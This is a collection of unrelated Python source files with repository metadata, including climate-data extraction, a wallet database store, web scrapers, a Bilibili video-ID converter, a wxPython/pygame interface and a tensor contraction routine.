641a3669fbc5bd16550b3e3d1c87db16add73a55
|
[] |
no_license
|
davixcky/holbertonschool-higher_level_programming
|
bb112af3e18994a46584ac3e78385e46c3d918f6
|
fe4cd0e95ee976b93bd47c85c2bc810049f568fa
|
refs/heads/master
| 2023-01-11T00:41:03.145968
| 2020-09-22T22:55:53
| 2020-09-22T22:55:53
| 259,390,611
| 0
| 5
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 291
|
py
|
#!/usr/bin/python3
'''Module for advanced'''
class MyInt(int):
'''Rebel class'''
def __eq__(self, other):
'''Override == operator'''
return not (self is not other)
def __ne__(self, other):
'''Override != operator'''
return (self is not other)
|
[
"dvdizcky@gmail.com"
] |
dvdizcky@gmail.com
|
cade239b0ece789edff3420e5fd5b30a5452ddee
|
facb8b9155a569b09ba66aefc22564a5bf9cd319
|
/wp2/era5_scripts/01_netCDF_extraction/erafive902TG/134-tideGauge.py
|
5cfea7896c09776590870458447a906f23f3c666
|
[] |
no_license
|
moinabyssinia/modeling-global-storm-surges
|
13e69faa8f45a1244a964c5de4e2a5a6c95b2128
|
6e385b2a5f0867df8ceabd155e17ba876779c1bd
|
refs/heads/master
| 2023-06-09T00:40:39.319465
| 2021-06-25T21:00:44
| 2021-06-25T21:00:44
| 229,080,191
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,595
|
py
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jun 01 10:00:00 2020
ERA5 netCDF extraction script
@author: Michael Tadesse
"""
import time as tt
import os
import pandas as pd
from d_define_grid import Coordinate, findPixels, findindx
from c_read_netcdf import readnetcdf
from f_era5_subsetV2 import subsetter
def extract_data(delta= 1):
"""
This is the master function that calls subsequent functions
to extract uwnd, vwnd, slp for the specified
tide gauges
delta: distance (in degrees) from the tide gauge
"""
print('Delta = {}'.format(delta), '\n')
#defining the folders for predictors
nc_path = {'slp' : "/lustre/fs0/home/mtadesse/era_five/slp",\
"wnd_u": "/lustre/fs0/home/mtadesse/era_five/wnd_u",\
'wnd_v' : "/lustre/fs0/home/mtadesse/era_five/wnd_v"}
surge_path = "/lustre/fs0/home/mtadesse/obs_surge"
csv_path = "/lustre/fs0/home/mtadesse/erafive_localized"
#cd to the obs_surge dir to get TG information
os.chdir(surge_path)
tg_list = os.listdir()
#################################
#looping through the predictor folders
#################################
for pf in nc_path.keys():
print(pf, '\n')
os.chdir(nc_path[pf])
####################################
#looping through the years of the chosen predictor
####################################
for py in os.listdir():
os.chdir(nc_path[pf]) #back to the predictor folder
print(py, '\n')
#get netcdf components - give predicor name and predictor file
nc_file = readnetcdf(pf, py)
lon, lat, time, pred = nc_file[0], nc_file[1], nc_file[2], \
nc_file[3]
x = 134
y = 135
#looping through individual tide gauges
for t in range(x, y):
#the name of the tide gauge - for saving purposes
# tg = tg_list[t].split('.mat.mat.csv')[0]
tg = tg_list[t]
#extract lon and lat data from surge csv file
print("tide gauge", tg, '\n')
os.chdir(surge_path)
if os.stat(tg).st_size == 0:
print('\n', "This tide gauge has no surge data!", '\n')
continue
surge = pd.read_csv(tg, header = None)
#surge_with_date = add_date(surge)
#define tide gauge coordinate(lon, lat)
tg_cord = Coordinate(float(surge.iloc[1,4]), float(surge.iloc[1,5]))
print(tg_cord)
#find closest grid points and their indices
close_grids = findPixels(tg_cord, delta, lon, lat)
ind_grids = findindx(close_grids, lon, lat)
ind_grids.columns = ['lon', 'lat']
#loop through preds#
#subset predictor on selected grid size
print("subsetting \n")
pred_new = subsetter(pred, ind_grids, time)
#create directories to save pred_new
os.chdir(csv_path)
#tide gauge directory
tg_name = tg.split('.csv')[0]
try:
os.makedirs(tg_name)
os.chdir(tg_name) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(tg_name)
#predictor directory
pred_name = pf
try:
os.makedirs(pred_name)
os.chdir(pred_name) #cd to it after creating it
except FileExistsError:
#directory already exists
os.chdir(pred_name)
#time for saving file
print("saving as csv")
yr_name = py.split('_')[-1]
save_name = '_'.join([tg_name, pred_name, yr_name])\
+ ".csv"
pred_new.to_csv(save_name)
#return to the predictor directory
os.chdir(nc_path[pf])
#run script
extract_data(delta= 1)
|
[
"michaelg.tadesse@gmail.com"
] |
michaelg.tadesse@gmail.com
|
b31979f988725cf694bfbad19ec793def2e31147
|
88e8e28b58092d5ba051582930c156872b9565a5
|
/unews/unews/items.py
|
ecc7fba0c3ac1e5fd2ade006f035a54de44947d0
|
[] |
no_license
|
dorahero/crawlers
|
b8a4a1c2592e817b365d56a87bee021d29598810
|
88e134fdd2493330622848f931638aabd6c906fe
|
refs/heads/master
| 2023-02-19T07:54:54.945144
| 2021-01-23T09:13:42
| 2021-01-23T09:13:42
| 276,884,804
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 339
|
py
|
# Define here the models for your scraped items
#
# See documentation in:
# https://docs.scrapy.org/en/latest/topics/items.html
import scrapy
class UnewsItem(scrapy.Item):
# define the fields for your item here like:
# name = scrapy.Field()
title = scrapy.Field()
text = scrapy.Field()
time = scrapy.Field()
pass
|
[
"dorahero2727@gmail.com"
] |
dorahero2727@gmail.com
|
23c71b0d50b91315b570e7451f6325c9285a753a
|
021dcf39f7cfb303ff427d7344026004f9d4cfdd
|
/bookit/geo/models/area.py
|
a95118209730353550ebf7ebe4ccac7d64d64fed
|
[
"MIT"
] |
permissive
|
kamranhossain/bookit
|
dfaca266b93e0ee8a50e88a2a7702a6f5ece35f1
|
4189a0ed620d7a595de2c113bb3a2d435d66d5f0
|
refs/heads/master
| 2021-05-11T23:36:00.630917
| 2017-08-16T20:30:33
| 2017-08-16T20:30:33
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
from django.db import models
class Area(models.Model):
name = models.CharField(
max_length=140
)
def __str__(self):
return self.name
|
[
"aniruddha@adhikary.net"
] |
aniruddha@adhikary.net
|
d29d5c2be6de0c5ffb14a35773221396e731327d
|
627cca9406c31ce30c493ff7502f79eb4c57eee3
|
/xcha/wallet/wallet_user_store.py
|
599b6716d9fb71d4e7865a65ef4cc60d9f06933f
|
[
"Apache-2.0"
] |
permissive
|
blockchiansea/xcha-blockchain
|
40c6d36813f671e94316a522904238f495f39f6b
|
7de0ba89056236e30069aef12fe25843f6093bcf
|
refs/heads/master
| 2023-07-26T02:36:57.654196
| 2021-09-06T06:04:21
| 2021-09-06T06:04:21
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,788
|
py
|
from typing import List, Optional
import aiosqlite
from xcha.util.db_wrapper import DBWrapper
from xcha.util.ints import uint32
from xcha.wallet.util.wallet_types import WalletType
from xcha.wallet.wallet_info import WalletInfo
class WalletUserStore:
"""
WalletUserStore keeps track of all user created wallets and necessary smart-contract data
"""
db_connection: aiosqlite.Connection
cache_size: uint32
db_wrapper: DBWrapper
@classmethod
async def create(cls, db_wrapper: DBWrapper):
self = cls()
self.db_wrapper = db_wrapper
self.db_connection = db_wrapper.db
await self.db_connection.execute("pragma journal_mode=wal")
await self.db_connection.execute("pragma synchronous=2")
await self.db_connection.execute(
(
"CREATE TABLE IF NOT EXISTS users_wallets("
"id INTEGER PRIMARY KEY AUTOINCREMENT,"
" name text,"
" wallet_type int,"
" data text)"
)
)
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS name on users_wallets(name)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS type on users_wallets(wallet_type)")
await self.db_connection.execute("CREATE INDEX IF NOT EXISTS data on users_wallets(data)")
await self.db_connection.commit()
await self.init_wallet()
return self
async def init_wallet(self):
all_wallets = await self.get_all_wallet_info_entries()
if len(all_wallets) == 0:
await self.create_wallet("Chia Wallet", WalletType.STANDARD_WALLET, "")
async def _clear_database(self):
cursor = await self.db_connection.execute("DELETE FROM users_wallets")
await cursor.close()
await self.db_connection.commit()
async def create_wallet(
self, name: str, wallet_type: int, data: str, id: Optional[int] = None, in_transaction=False
) -> Optional[WalletInfo]:
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT INTO users_wallets VALUES(?, ?, ?, ?)",
(id, name, wallet_type, data),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
return await self.get_last_wallet()
async def delete_wallet(self, id: int, in_transaction: bool):
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(f"DELETE FROM users_wallets where id={id}")
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def update_wallet(self, wallet_info: WalletInfo, in_transaction):
if not in_transaction:
await self.db_wrapper.lock.acquire()
try:
cursor = await self.db_connection.execute(
"INSERT or REPLACE INTO users_wallets VALUES(?, ?, ?, ?)",
(
wallet_info.id,
wallet_info.name,
wallet_info.type,
wallet_info.data,
),
)
await cursor.close()
finally:
if not in_transaction:
await self.db_connection.commit()
self.db_wrapper.lock.release()
async def get_last_wallet(self) -> Optional[WalletInfo]:
cursor = await self.db_connection.execute("SELECT MAX(id) FROM users_wallets;")
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return await self.get_wallet_by_id(row[0])
async def get_all_wallet_info_entries(self) -> List[WalletInfo]:
"""
Return a set containing all wallets
"""
cursor = await self.db_connection.execute("SELECT * from users_wallets")
rows = await cursor.fetchall()
await cursor.close()
result = []
for row in rows:
result.append(WalletInfo(row[0], row[1], row[2], row[3]))
return result
async def get_wallet_by_id(self, id: int) -> Optional[WalletInfo]:
"""
Return a wallet by id
"""
cursor = await self.db_connection.execute("SELECT * from users_wallets WHERE id=?", (id,))
row = await cursor.fetchone()
await cursor.close()
if row is None:
return None
return WalletInfo(row[0], row[1], row[2], row[3])
|
[
"xchanet@gmail.com"
] |
xchanet@gmail.com
|
5dc79f13f7a92a35dd46e4a129b04ec494cea9fc
|
ad13583673551857615498b9605d9dcab63bb2c3
|
/output/models/nist_data/atomic/id/schema_instance/nistschema_sv_iv_atomic_id_max_length_4_xsd/__init__.py
|
2ea09c36077f1939d69de901a715d7c02f4faea0
|
[
"MIT"
] |
permissive
|
tefra/xsdata-w3c-tests
|
397180205a735b06170aa188f1f39451d2089815
|
081d0908382a0e0b29c8ee9caca6f1c0e36dd6db
|
refs/heads/main
| 2023-08-03T04:25:37.841917
| 2023-07-29T17:10:13
| 2023-07-30T12:11:13
| 239,622,251
| 2
| 0
|
MIT
| 2023-07-25T14:19:04
| 2020-02-10T21:59:47
|
Python
|
UTF-8
|
Python
| false
| false
| 263
|
py
|
from output.models.nist_data.atomic.id.schema_instance.nistschema_sv_iv_atomic_id_max_length_4_xsd.nistschema_sv_iv_atomic_id_max_length_4 import (
NistschemaSvIvAtomicIdMaxLength4,
Out,
)
__all__ = [
"NistschemaSvIvAtomicIdMaxLength4",
"Out",
]
|
[
"tsoulloftas@gmail.com"
] |
tsoulloftas@gmail.com
|
ace1317e4d350f5245822cf11849f62bbcfe6a10
|
ae9f0a71576cf2d9f46f684ae412c741261c9ded
|
/tests/plugins/shortcircuit.py
|
8403b68ec141b5afb308aa44d94754063b583f46
|
[
"MIT"
] |
permissive
|
sugarchain-project/lightning
|
95adf492b2f5d3b4c20170b17a7e556b9b3abbd1
|
c73e21e099ca2f5ed02afae316f477e8a1fd1280
|
refs/heads/master
| 2020-08-05T17:02:38.936348
| 2019-10-04T08:56:23
| 2019-10-04T08:56:23
| 212,624,853
| 2
| 2
|
NOASSERTION
| 2019-10-03T16:20:19
| 2019-10-03T16:20:18
| null |
UTF-8
|
Python
| false
| false
| 231
|
py
|
#!/usr/bin/env python3
from lightning import Plugin
plugin = Plugin()
@plugin.hook("htlc_accepted")
def on_htlc_accepted(onion, htlc, plugin, **kwargs):
return {"result": "resolve", "payment_key": "00" * 32}
plugin.run()
|
[
"rusty@rustcorp.com.au"
] |
rusty@rustcorp.com.au
|
d8f90ee6ddf75cf52f82aca971d5e66cc8a69bad
|
3d19e1a316de4d6d96471c64332fff7acfaf1308
|
/Users/T/tlevine/landbank_branches.py
|
e7046f1be1fbea8d12176b46f65cc7ee7138faf7
|
[] |
no_license
|
BerilBBJ/scraperwiki-scraper-vault
|
4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc
|
65ea6a943cc348a9caf3782b900b36446f7e137d
|
refs/heads/master
| 2021-12-02T23:55:58.481210
| 2013-09-30T17:02:59
| 2013-09-30T17:02:59
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,898
|
py
|
from scraperwiki.sqlite import save
from scraperwiki import swimport
keyify=swimport('keyify').keyify
from lxml.html import fromstring
from urllib2 import urlopen
URL='http://www.landbank.co.za/contact/branches.php'
from time import time
strip_address = swimport('strip_address').strip_address
DATE=time()
def main():
blocks=get_blocks()
blockId=0
for block in blocks:
blockId+=1
block_info=block.data()
block_info['blockId']=blockId
block_info['date_scraped']=DATE
save([],block_info,'blocks')
for branch in block.branches():
branch_info=branch.data()
branch_info['blockId']=blockId
branch_info['date_scraped']=DATE
save([],branch_info,'branches')
def get_blocks():
x=fromstring(urlopen(URL).read())
blocks=x.xpath('//div[div[@class="float_info_left"]]')
return [Block(block) for block in blocks]
class Block:
def __init__(self,block):
self.block=block
def __str__(self):
title,person=self.header()
return title
def header(self):
title,person=self.block.xpath('preceding-sibling::strong[position()<=2]/text()')
return title,person
def region(self):
return self.block.xpath('preceding-sibling::div[div[@class="darker"]]/div/h3/text()')[-1]
def branch_names(self):
return self.block.xpath('descendant::strong/text()')
def data(self):
title,person=self.header()
return {
"blockName":title
, "blockPerson":person
, "region":self.region()
}
def branches(self):
b=[]
for branch_name in self.branch_names():
nodes=self.block.xpath('descendant::p[strong/text()="%s"]'%branch_name)
assert len(nodes)==1
b.append(Branch(nodes[0]))
return b
class Branch:
def __init__(self,p):
self.p=p
def __str__(self):
return self.name()
def name(self):
nodes=self.p.xpath('strong/text()')
assert 1==len(nodes)
return nodes[0]
def address(self):
return '\n'.join(self.p.xpath('text()'))
def phonecount(self):
return len(self.b_text())
def address_sans_phone(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()])
def postcode(self):
return self.p.xpath('text()')[-self.phonecount()-1]
def town(self):
return self.p.xpath('text()')[-self.phonecount()-2]
def street_address(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()-2])
def b_text(self):
return self.p.xpath('b/text()')
def phones(self):
numbers=self.p.xpath('text()')[-self.phonecount():]
return zip(self.b_text(),numbers)
def data(self):
d=dict([ (keyify(phone[0]),phone[1]) for phone in self.phones() ])
d.update({
"branchName":self.name()
, "address_raw":self.address()
, "town":strip_address(self.town())
, "address":strip_address(self.address_sans_phone())
, "street-address":strip_address(self.street_address())
, "postcode":strip_address(self.postcode())
})
return d
main()from scraperwiki.sqlite import save
from scraperwiki import swimport
keyify=swimport('keyify').keyify
from lxml.html import fromstring
from urllib2 import urlopen
URL='http://www.landbank.co.za/contact/branches.php'
from time import time
strip_address = swimport('strip_address').strip_address
DATE=time()
def main():
blocks=get_blocks()
blockId=0
for block in blocks:
blockId+=1
block_info=block.data()
block_info['blockId']=blockId
block_info['date_scraped']=DATE
save([],block_info,'blocks')
for branch in block.branches():
branch_info=branch.data()
branch_info['blockId']=blockId
branch_info['date_scraped']=DATE
save([],branch_info,'branches')
def get_blocks():
x=fromstring(urlopen(URL).read())
blocks=x.xpath('//div[div[@class="float_info_left"]]')
return [Block(block) for block in blocks]
class Block:
def __init__(self,block):
self.block=block
def __str__(self):
title,person=self.header()
return title
def header(self):
title,person=self.block.xpath('preceding-sibling::strong[position()<=2]/text()')
return title,person
def region(self):
return self.block.xpath('preceding-sibling::div[div[@class="darker"]]/div/h3/text()')[-1]
def branch_names(self):
return self.block.xpath('descendant::strong/text()')
def data(self):
title,person=self.header()
return {
"blockName":title
, "blockPerson":person
, "region":self.region()
}
def branches(self):
b=[]
for branch_name in self.branch_names():
nodes=self.block.xpath('descendant::p[strong/text()="%s"]'%branch_name)
assert len(nodes)==1
b.append(Branch(nodes[0]))
return b
class Branch:
def __init__(self,p):
self.p=p
def __str__(self):
return self.name()
def name(self):
nodes=self.p.xpath('strong/text()')
assert 1==len(nodes)
return nodes[0]
def address(self):
return '\n'.join(self.p.xpath('text()'))
def phonecount(self):
return len(self.b_text())
def address_sans_phone(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()])
def postcode(self):
return self.p.xpath('text()')[-self.phonecount()-1]
def town(self):
return self.p.xpath('text()')[-self.phonecount()-2]
def street_address(self):
return '\n'.join(self.p.xpath('text()')[0:-self.phonecount()-2])
def b_text(self):
return self.p.xpath('b/text()')
def phones(self):
numbers=self.p.xpath('text()')[-self.phonecount():]
return zip(self.b_text(),numbers)
def data(self):
d=dict([ (keyify(phone[0]),phone[1]) for phone in self.phones() ])
d.update({
"branchName":self.name()
, "address_raw":self.address()
, "town":strip_address(self.town())
, "address":strip_address(self.address_sans_phone())
, "street-address":strip_address(self.street_address())
, "postcode":strip_address(self.postcode())
})
return d
main()
|
[
"pallih@kaninka.net"
] |
pallih@kaninka.net
|
04e72e6c7258fd53dbcd5d95b249789f8fd864f3
|
c5b738612c1ecbce0583a327032db1e6c339de0b
|
/bv-av互转工具/bv_av.py
|
f9638358b8b57e57698495513ae8afc32d628271
|
[
"BSD-2-Clause"
] |
permissive
|
helloworldSB/Gear-s-toolBox-archive
|
c766d27e45a9eb9a99dfa360ac68a0ac1c93d8c7
|
40bc05cbb0060ecc3d9f941276c9caccbe1b8d82
|
refs/heads/master
| 2023-01-01T00:38:31.211587
| 2020-10-16T12:43:25
| 2020-10-16T12:43:25
| 306,789,467
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,831
|
py
|
class av_bv_cls:
def __init__(self):
self.table='fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'
self.tr={}
for i in range(58):
self.tr[self.table[i]]=i
self.s=[11,10,3,8,4,6]
self.xor=177451812
self.add=8728348608
def dec(self,x):
r=0
for i in range(6):
r+=self.tr[x[self.s[i]]]*58**i
return (r-self.add)^self.xor
def enc(self,x):
x=(x^self.xor)+self.add
r=list('BV1 4 1 7 ')
for i in range(6):
r[self.s[i]]=self.table[x//58**i%58]
return ''.join(r)
from urllib import request,parse
from json import loads#,dumps
while True:
ctrl_num = input(r'''
您希望采用哪种API?(输入数字)
1.官方API 2.离线算法
按 CTRL+C 结束
''')
if ctrl_num == '1' or ctrl_num == '2':
video_num = input('''
请输入视频号
记得带上av或BV前缀
''')
if video_num[:2] == 'av' or video_num[:2] == 'AV':flag = False
elif video_num[:2] == 'BV' or video_num[:2] == 'bv':flag = True
if ctrl_num == '1':
URL = r'http://api.bilibili.com/x/web-interface/archive/stat?'
if flag:URL += r'bvid='
else:URL += r'aid='
URL += video_num[2:]
req = request.Request(URL)
req.add_header("User-Agent","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/50.0.2661.87 Safari/537.36")
with request.urlopen(req) as f:
temp1 = f.read()
temp1 = loads(temp1)
if temp1['code'] != 0:
print('转换错误!错误代码:',temp1['code'],'错误值:',temp1['message'])
continue
print('\n转换成功!')
temp2 = temp1['data']
print('av号:',temp2['aid'])
print('bv号:',temp2['bvid'])
print('投币数:',temp2['coin'])
print('共被浏览过',temp2['view'],'次')
print('共有',temp2['reply'],'个评论')
print('点赞数:',temp2['like'])
print('收藏数:',temp2['favorite'])
print('分享数:',temp2['share'])
print(r'授权方式(1代表原创,2代表搬运):',temp2['copyright'])
print(r'历史排名:',temp2['his_rank'])
print(r'白嫖数:',temp2['view'] - temp2['coin'] - temp2['like'] - temp2['favorite'])
print('\n',r'注:白嫖数=观看数-投币人数-点赞人数-收藏人数')
elif ctrl_num == '2':
if flag:print('av号:av',av_bv_cls().dec(video_num),sep='')
else:print('bv号:',av_bv_cls().enc(int(video_num[2:])))
|
[
"noreply@gitee.com"
] |
noreply@gitee.com
|
c3c32b313e00e643cc818413d71b1bfdc3db915c
|
eee3a183136bdebed599249604b63f0b0f02ba71
|
/pyrates/ui.py
|
095ed9079bf11379368972be213dff233665f534
|
[] |
no_license
|
gutomaia/pyrates
|
3971d332a0977a8d130c0836e86c3368a8531a8b
|
a81ef57c368e1341a0e09b548a94f27801f89546
|
refs/heads/master
| 2021-06-29T12:53:56.033594
| 2017-09-20T19:00:45
| 2017-09-20T19:00:45
| 104,124,622
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,567
|
py
|
import wx, sys, os, pygame
### PYGAME IN WX ###
# A simple test of embedding Pygame in a wxPython frame
#
# By David Barker (aka Animatinator), 14/07/2010
# Patch for cross-platform support by Sean McKean, 16/07/2010
# Patch to fix redrawing issue by David Barker, 20/07/2010
# Second window demo added by David Barker, 21/07/2010
class PygameDisplay(wx.Window):
def __init__(self, parent, ID):
wx.Window.__init__(self, parent, ID)
self.parent = parent
self.hwnd = self.GetHandle()
self.size = self.GetSizeTuple()
self.size_dirty = True
self.timer = wx.Timer(self)
self.Bind(wx.EVT_PAINT, self.OnPaint)
self.Bind(wx.EVT_TIMER, self.Update, self.timer)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.fps = 60.0
self.timespacing = 1000.0 / self.fps
self.timer.Start(self.timespacing, False)
self.linespacing = 5
def Update(self, event):
self.Redraw()
def Redraw(self):
if self.size_dirty:
self.screen = pygame.Surface(self.size, 0, 32)
self.size_dirty = False
self.pygame_redraw(self.timer.GetInterval())
s = pygame.image.tostring(self.screen, 'RGB') # Convert the surface to an RGB string
img = wx.ImageFromData(self.size[0], self.size[1], s) # Load this string into a wx image
bmp = wx.BitmapFromImage(img) # Get the image in bitmap form
dc = wx.ClientDC(self) # Device context for drawing the bitmap
dc.DrawBitmap(bmp, 0, 0, False) # Blit the bitmap image to the display
del dc
def pygame_redraw(self, deltaTime):
self.screen.fill((0,0,0))
cur = 0
w, h = self.screen.get_size()
while cur <= h:
pygame.draw.aaline(self.screen, (255, 255, 255), (0, h - cur), (cur, 0))
cur += self.linespacing
def OnPaint(self, event):
self.Redraw()
event.Skip() # Make sure the parent frame gets told to redraw as well
def OnSize(self, event):
self.size = self.GetSizeTuple()
self.size_dirty = True
def Kill(self, event):
# Make sure Pygame can't be asked to redraw /before/ quitting by unbinding all methods which
# call the Redraw() method
# (Otherwise wx seems to call Draw between quitting Pygame and destroying the frame)
# This may or may not be necessary now that Pygame is just drawing to surfaces
self.Unbind(event = wx.EVT_PAINT, handler = self.OnPaint)
self.Unbind(event = wx.EVT_TIMER, handler = self.Update, source = self.timer)
ID_ABOUT = 12753
class Frame(wx.Frame):
def init_menubar(self):
self.menubar = wx.MenuBar()
fileMenu = wx.Menu()
newitem = wx.MenuItem(fileMenu, wx.ID_NEW, text='New', kind = wx.ITEM_NORMAL)
fileMenu.AppendItem(newitem)
fileMenu.AppendSeparator()
quit = wx.MenuItem(fileMenu, wx.ID_EXIT, '&Quit\tCtrl+Q')
fileMenu.AppendItem(quit)
helpMenu = wx.Menu()
aboutItem = wx.MenuItem(helpMenu, ID_ABOUT, text='About', kind = wx.ITEM_NORMAL)
helpMenu.AppendItem(aboutItem)
self.menubar.Append(fileMenu, '&File')
self.menubar.Append(helpMenu, '&Help')
self.SetMenuBar(self.menubar)
self.Bind(wx.EVT_MENU, self.menuhandler)
def menuhandler(self, event):
menu_id = event.GetId()
if menu_id == wx.ID_EXIT:
self.Kill(event)
def init_toolbar(self):
# self.toolbar = self.CreateToolBar(wx.TB_TEXT, wx.TB_NOICONS, -1)
self.toolbar = self.CreateToolBar()
run = self.toolbar.AddLabelTool(wx.ID_ANY, 'Run', wx.Bitmap('assets/icons/run.png'))
self.Bind(wx.EVT_TOOL, self.run_command, run)
self.toolbar.Realize()
def run_command(self, event):
source = self.editor.GetText()
self.display.active_scene.input_code(source)
def init_statusbar(self):
self.statusbar = self.CreateStatusBar()
self.statusbar.SetFieldsCount(3)
self.statusbar.SetStatusWidths([-3, -4, -2])
self.statusbar.SetStatusText("pyRATES", 0)
self.statusbar.SetStatusText("Look, it's a nifty status bar!!!", 1)
def __init__(self, parent):
wx.Frame.__init__(self, parent, -1, size = (600, 600))
self.SetTitle("Pyrates")
self.init_menubar()
self.init_toolbar()
self.init_statusbar()
from gameengine import DisplayScene
self.display = DisplayScene(self, -1)
# self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_CLOSE, self.Kill)
self.curframe = 0
self.timer = wx.Timer(self)
# self.Bind(wx.EVT_SCROLL, self.OnScroll)
self.Bind(wx.EVT_SIZE, self.OnSize)
self.Bind(wx.EVT_TIMER, self.Update, self.timer)
self.timer.Start((1000.0 / self.display.fps))
from editor import SourceEditor
self.editor = SourceEditor(self)
self.sizer = wx.BoxSizer(wx.VERTICAL)
self.sizer.Add(self.display, 1, flag = wx.EXPAND)
self.sizer.Add(self.editor, 1, flag = wx.EXPAND)
self.SetAutoLayout(True)
self.SetSizer(self.sizer)
self.Layout()
def Kill(self, event):
self.display.Kill(event)
self.Destroy()
def OnSize(self, event):
self.Layout()
def Update(self, event):
pass
# self.statusbar.SetStatusText("Frame %i" % self.curframe, 2)
def OnScroll(self, event):
self.display.linespacing = self.slider.GetValue()
|
[
"guto@guto.net"
] |
guto@guto.net
|
5279d2be8c763659dcb6380332b42896fbc7aadf
|
ebd5c4632bb5f85c9e3311fd70f6f1bf92fae53f
|
/P.O.R.-master/pirates/band/BandConstance.py
|
3084b1fafdd7057904fb44feb8192cad6b7ec899
|
[] |
no_license
|
BrandonAlex/Pirates-Online-Retribution
|
7f881a64ec74e595aaf62e78a39375d2d51f4d2e
|
980b7448f798e255eecfb6bd2ebb67b299b27dd7
|
refs/heads/master
| 2020-04-02T14:22:28.626453
| 2018-10-24T15:33:17
| 2018-10-24T15:33:17
| 154,521,816
| 2
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,244
|
py
|
outcome_ok = 0
outcome_declined = 9
outcome_not_online = 10
outcome_already_invited = 11
outcome_already_in_Band = 12
outcome_full = 13
outcome_recently_invited = 14
MAX_BAND_MEMBERS = 12
BandMakeEvent = 'BandMakeEvent'
BandAddEvent = 'BandAddEvent'
BandSetCaptainEvent = 'BandSetCaptainEvent'
BandRemoveEvent = 'BandRemoveEvent'
BandOnlineEvent = 'BandOnlineEvent'
BandOfflineEvent = 'BandOfflineEvent'
BandDetailsEvent = 'BandDetailsEvent'
BandRejectInviteEvent = 'BandRejectInviteEvent'
BandRetractInviteEvent = 'BandRetractInviteEvent'
BandInvitationEvent = 'BandInvitationEvent'
BandInvitationResponceEvent = 'BandIinvitationResponce'
BandRejoinEvent = 'BandRejoinEvent'
BandMemberNameChange = 'BandMemberNameChange'
BandMemberHpChange = 'BandMemberHpChange'
BandMemberMaxHpChange = 'BandMemberMaxHpChange'
BandMemberShipChange = 'BandMemberShipChange'
BandMemberSinceChange = 'BandMemberSinceChange'
BandMemberOnlineChange = 'BandMemberOnlineChange'
BandMemberPVPChange = 'BandMemberPVPChange'
BandMemberParlorChange = 'BandMemberParlorChange'
BandMemberStatusChange = 'BandMemberStatusChange'
BandMemberManagerChange = 'BandMemberManagerChange'
BandMemberNameChange = 'BandMemberNameChange'
BandMembershipChange = 'BandMembershipChange'
|
[
"brandoncarden12345@gmail.com"
] |
brandoncarden12345@gmail.com
|
c85814fada2df5966221b0945bc1ba5ac1480924
|
095521582f598b65b76f222d8c1acbcaca0c24bf
|
/output_raw/output_input_Lx1Ly1.py
|
6fc5163f524ebec0cbe9a033d06a5b0d688ee15f
|
[
"MIT"
] |
permissive
|
ryuikaneko/itps_contraction
|
cf07e41d32e93c10db6ebeb1c4f5246b238e737b
|
10816fb6c90d77f5a3b2f804ab22573d1d676eb4
|
refs/heads/master
| 2020-08-28T23:05:00.262183
| 2020-08-03T01:04:22
| 2020-08-03T01:04:22
| 217,847,703
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,196
|
py
|
def Contract_scalar_1x1(\
t0_2,t1_2,t2_2,\
t0_1,t1_1,t2_1,\
t0_0,t1_0,t2_0,\
o1_1\
):
##############################
# ./input/input_Lx1Ly1.dat
##############################
# (o1_1*(t1_1.conj()*((t2_1*(t2_0*t1_0))*(t1_1*((t0_0*t0_1)*(t0_2*(t2_2*t1_2)))))))
# cpu_cost= 6.04e+10 memory= 4.0004e+08
# final_bond_order ()
##############################
return np.tensordot(
o1_1, np.tensordot(
t1_1.conj(), np.tensordot(
np.tensordot(
t2_1, np.tensordot(
t2_0, t1_0, ([1], [0])
), ([1], [0])
), np.tensordot(
t1_1, np.tensordot(
np.tensordot(
t0_0, t0_1, ([1], [0])
), np.tensordot(
t0_2, np.tensordot(
t2_2, t1_2, ([0], [1])
), ([1], [1])
), ([1], [0])
), ([0, 1], [1, 4])
), ([0, 1, 3, 4], [5, 0, 3, 1])
), ([0, 1, 2, 3], [3, 4, 0, 1])
), ([0, 1], [1, 0])
)
|
[
"27846552+ryuikaneko@users.noreply.github.com"
] |
27846552+ryuikaneko@users.noreply.github.com
|
86f698f7d8d5c7cfd608eaafe79d63a8b0eb18e9
|
4111ca5a73a22174f189361bef654c3f91c3b7ed
|
/Lintcode/Ladder_all_A_OA/1563. Shortest path to the destination.py
|
48bee8bb3ef8e656816609bf09cf2f8d0f824c98
|
[
"MIT"
] |
permissive
|
ctc316/algorithm-python
|
58b541b654509ecf4e9eb8deebfcbdf785699cc4
|
ac4580d55e05e93e407c6156c9bb801808027d60
|
refs/heads/master
| 2020-03-16T06:09:50.130146
| 2019-08-02T02:50:49
| 2019-08-02T02:50:49
| 132,548,222
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
